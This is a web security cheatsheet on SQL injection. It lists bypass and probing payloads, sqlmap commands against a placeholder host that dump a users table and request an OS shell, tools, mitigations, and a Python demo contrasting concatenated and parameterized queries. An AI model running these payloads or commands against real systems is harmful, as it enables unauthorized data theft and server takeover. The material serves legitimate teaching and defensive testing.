
SQL Injection

Web cheatsheet — Web application enumeration and exploitation techniques.

Overview

SQL injection is a code injection technique that exploits flaws in how an application builds queries for its database layer. An attacker supplies input that the backend database executes as part of the query, potentially bypassing authentication, exfiltrating data, or performing administrative operations.

The vulnerability arises when user input is concatenated into a SQL statement without being correctly escaped or bound as a parameter, so string literal escape characters in the input (such as a single quote) change the structure of the intended query rather than being treated as data.

Category: Web

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting SQL injection:

' OR '1'='1
' OR 1=1--
" OR 1=1--
' UNION SELECT NULL--
' AND SLEEP(5)--
' WAITFOR DELAY '0:0:5'--
' AND 1=1-- (true page)
' AND 1=2-- (false page)
sqlmap -u 'http://target.com/page?id=1' --batch
sqlmap -u 'http://target.com/page?id=1' --dbs
sqlmap -u 'http://target.com/page?id=1' -D dbname --tables
sqlmap -u 'http://target.com/page?id=1' -D dbname -T users --dump
sqlmap -r request.txt -p parameter --os-shell

Tools & Techniques

Recommended tools for SQL injection:

  • SQLMap: automated SQL injection detection and exploitation
  • Burp Suite: intercept and modify requests
  • jSQL Injection: GUI-based SQL injection tool
  • NoSQLMap: automated NoSQL injection tool
  • Manual payload crafting for WAF bypasses

Prevention & Mitigation

Security recommendations to prevent SQL injection:

  • Use parameterized queries / prepared statements
  • Employ strict input validation and allowlists
  • Apply the principle of least privilege for database users
  • Use a Web Application Firewall (WAF) as defense-in-depth
  • Regularly update and patch database systems
  • Conduct code reviews with automated SAST tools
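The following Python example, added here and not part of the original cheatsheet, ties the Overview to the first two mitigations above. It puts a string-concatenated login query next to its parameterized form and shows why the `' OR 1=1--` payload listed earlier changes the structure of the first but is treated as plain data by the second. It also shows allowlist validation for an ORDER BY column, since identifiers cannot be bound as parameters. The database, table, user records and the helper names (`make_db`, `login_vulnerable`, `login_parameterized`, `list_users_sorted`) are all constructed for this illustration; the plaintext passwords exist only to keep the demo short and are not a recommendation.

```python
import sqlite3

# Constructed sample data: an in-memory SQLite database with one users table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """The 'before' form: input is concatenated into the SQL text.

    A quote in either field closes the string literal, and '--' comments out
    the rest of the statement, so the password check is never evaluated.
    """
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """The hardened form: placeholders are bound by the driver.

    The query text is fixed before any user data is seen, so quotes and
    comment markers in the input are compared as literal characters.
    """
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Column names cannot be bound as parameters, so the caller's choice is
# checked against a fixed allowlist rather than escaped.
ALLOWED_SORT_COLUMNS = {"id", "username", "role"}


def list_users_sorted(conn, sort_column):
    """ORDER BY with an allowlisted identifier; anything else is rejected."""
    if sort_column not in ALLOWED_SORT_COLUMNS:
        raise ValueError("sort column not permitted: %r" % sort_column)
    # Safe only because sort_column was just validated against the fixed set.
    rows = conn.execute(
        "SELECT username FROM users ORDER BY " + sort_column
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1--"  # the cheatsheet's second payload, used as the username
    print("concatenated, payload:", login_vulnerable(db, payload, "wrong"))     # alice
    print("parameterized, payload:", login_parameterized(db, payload, "wrong")) # None
    print("parameterized, valid:", login_parameterized(db, "alice", "s3cret")) # alice
    print("sorted by allowlisted column:", list_users_sorted(db, "username"))
```

Running the block shows the concatenated query logging in as the first user with a bogus password, while the parameterized query returns nothing for the same input and still works for valid credentials. The allowlist is a positive check: `password` is a real column, yet `list_users_sorted(db, "password")` raises, because only names the application intends to expose are accepted.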
